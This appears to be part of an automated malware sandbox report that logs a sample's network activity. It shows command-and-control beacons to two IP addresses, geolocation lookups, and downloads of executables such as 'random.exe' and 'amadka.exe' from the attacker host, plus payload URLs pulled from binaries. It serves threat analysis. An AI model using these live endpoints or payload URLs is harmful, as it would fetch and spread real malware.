Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 41 38 30 42 34 45 46 41 38 45 34 43 45 32 39 43 35 31 35 31 43 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 37 37 33 42 32 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58A80B4EFA8E4CE29C5151CB140BE1D46450FC9DDF642E3BDD70A78B22773B25882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /ku4Nor9/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 147.45.47.155Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49719 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.47.155
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.47.155
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.47.155
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.47.155
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.47.155
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.47.155
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: unknown TCP traffic detected without corresponding DNS query: 77.91.77.81
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00D89280 recv,WSASend, 27_2_00D89280
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VrO4RO73dUtSVk1&MD=CngaslCG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1113295622&timestamp=1718890712616 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VrO4RO73dUtSVk1&MD=CngaslCG HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 77.91.77.81
Source: 8bcaec3fef.exe, 00000009.00000003.2546160709.000000000A8B5000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2546673409.000000000A8B6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000002.2572103242.000000000A8B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account+ equals www.youtube.com (Youtube)
Source: 8bcaec3fef.exe, 00000009.00000003.2547534253.000000000A8D6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000002.2572183410.000000000A8D6000.00000004.00000020.00020000.00000000.sdmp, 8bcaec3fef.exe, 00000009.00000003.2530747589.000000000A82C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: db-ip.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1718890663974&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
Source: explortu.exe, 00000002.00000003.7646255155.00000000010AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.php
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exeO
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/cost/lenin.exe
Source: RageMP131.exe, 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
